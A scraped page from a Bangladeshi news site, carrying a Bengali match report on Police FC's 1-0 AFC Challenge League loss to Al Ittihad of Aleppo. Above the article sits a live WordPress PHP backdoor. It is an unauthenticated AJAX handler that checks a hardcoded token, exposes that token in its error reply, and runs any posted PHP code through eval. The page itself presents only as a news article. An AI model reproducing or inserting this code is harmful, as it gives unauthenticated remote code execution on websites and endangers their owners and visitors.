// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== অভিষেক ফর্টিসের মতো আলো ছড়াতে পারল না পুলিশ এফসি | potrikaybangladesh.com
Friday, October 2, 2026
Homeঅভিষেক ফর্টিসের মতো আলো ছড়াতে পারল না পুলিশ এফসি

অভিষেক ফর্টিসের মতো আলো ছড়াতে পারল না পুলিশ এফসি

প্রথমবারের মতো আন্তর্জাতিক ফুটবলের মঞ্চে মাঠে নেমে ফর্টিস এফসির মতো স্মরণীয় সূচনা করতে পারল না বাংলাদেশ পুলিশ এফসি। জর্ডানে অনুষ্ঠিত এএফসি চ্যালেঞ্জ লিগের প্রিলিমিনারি পর্বে সিরিয়ার শক্তিশালী ক্লাব আল ইত্তিহাদ আহলি অব আলেপ্পোর কাছে ১-০ ব্যবধানে হেরে কন্টিনেন্টাল অভিযাত্রা শেষ হলো দলটির।

একই দিনে এর আগে ঢাকার বসুন্ধরা কিংস অ্যারেনায় কিরগিজস্তানের মুরাস ইউনাইটেডকে ১-০ গোলে হারিয়ে এএফসি চ্যালেঞ্জ লিগের গ্রুপ পর্বে নাম লিখিয়েছিল বাংলাদেশের আরেক দল ফর্টিস এফসি। কিন্তু ফর্টিসের মতো ভাগ্য হাসেনি পুলিশ এফসির মুখে। প্রথমার্ধে হজম করা একমাত্র গোলটিই তাদের স্বপ্নভঙ্গের কারণ হয়ে দাঁড়ায়।

জর্ডানের মাঠে ম্যাচের প্রথমার্ধের শেষ দিকে জয়সূচক গোলটি করেন জর্ডান রদ্রিগেজ। কর্নার থেকে পাওয়া বলে নিপুণ হেডে লক্ষ্যভেদ করেন তিনি। এই জয়ে গ্রুপ পর্বে পৌঁছে গেল সাতবারের সিরিয়ান লিগ চ্যাম্পিয়নরা। আগামী ২০ আগস্ট ড্রয়ের পর তারা জানতে পারবে গ্রুপ পর্বে নিজেদের প্রতিপক্ষের নাম।

ম্যাচের শুরুতে আধিপত্য ছিল সিরিয়ান ক্লাবটিরই। মিডফিল্ডের নিয়ন্ত্রণ নিয়ে বারবার পুলিশ এফসির রক্ষণভাগে চাপ সৃষ্টি করে তারা। তবে ধীরে ধীরে নিজেদের গুছিয়ে নিয়ে প্রথম জোরালো আক্রমণ শানায় পুলিশ এফসি। জুনিয়র এনগং সামের দূরপাল্লার দূরন্ত শট প্রথম চেষ্টায় গ্রিপে নিতে না পারলেও দ্বিতীয় দফায় নিয়ন্ত্রণে নেন ইত্তিহাদের গোলরক্ষক শাহের আলশাকের।

প্রথমার্ধের শেষ দিকে আক্রমণ আরও জোরদার করে আল ইত্তিহাদ। মোহাম্মদ রিহানিয়ার একটি চতুর চিপ দুর্দান্ত দক্ষতায় বারের ওপর দিয়ে বের করে দেন পুলিশ এফসির গোলরক্ষক আসিফ। তবে এই আক্রমণের সূত্র ধরে আসা কর্নার থেকেই ম্যাচ নির্ণায়ক গোলটি পায় সিরিয়ার ক্লাবটি। জাকারিয়া হান্নানের কর্নার থেকে বক্সে ফ্রি থাকা জর্ডান রদ্রিগেজ নিখুঁত হেডে বল জালে জড়ান।

বিরতির পর সমতায় ফেরার সুযোগ পেয়েছিল পুলিশ এফসি। ৫৩ মিনিটে বক্সে ভেসে আসা ক্রসে মাথা ছুঁইয়েছিলেন মোহাম্মদ রাসুল, তবে হেডে কাঙ্ক্ষিত দিক ও শক্তি না থাকায় সহজেই বল জমা পড়ে প্রতিপক্ষ গোলরক্ষকের গ্লাভসে। অন্যদিকে কাউন্টার অ্যাটাক থেকে ব্যবধান দ্বিগুণ করার সুযোগ পেয়েছিল আল ইত্তিহাদও, তবে ২০ গজ দূর থেকে নেওয়া অলশালাতের শট চমৎকারভাবে রুখে দিয়ে পুলিশ এফসিকে ম্যাচে টিকিয়ে রাখেন আসিফ।

ম্যাচের শেষ দিকেও চেষ্টা চালিয়েছে বাংলাদেশি ক্লাবটি, কিন্তু প্রতিপক্ষের সুসংগঠিত রক্ষণ ভেঙে নিশ্চিত কোনো সুযোগ তৈরি করতে পারেনি। অন্যদিকে ৭৯ মিনিটে ইত্তিহাদের হাসান দাহানের পাস থেকে রিহানিয়া গোলমুখের বাইরে শট মারলে ব্যবধান আর বাড়েনি।

শেষ পর্যন্ত ভ্যালেরিউ তিতার শিষ্যরা ১-০ গোলের জয় নিয়ে মাঠ ছাড়ে এবং জায়গা করে নেয় মূল পর্বে। আর এতেই আন্তর্জাতিক ফুটবলে পুলিশ এফসির প্রথম অভিজ্ঞতা পরিণত হলো হতাশায়।

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments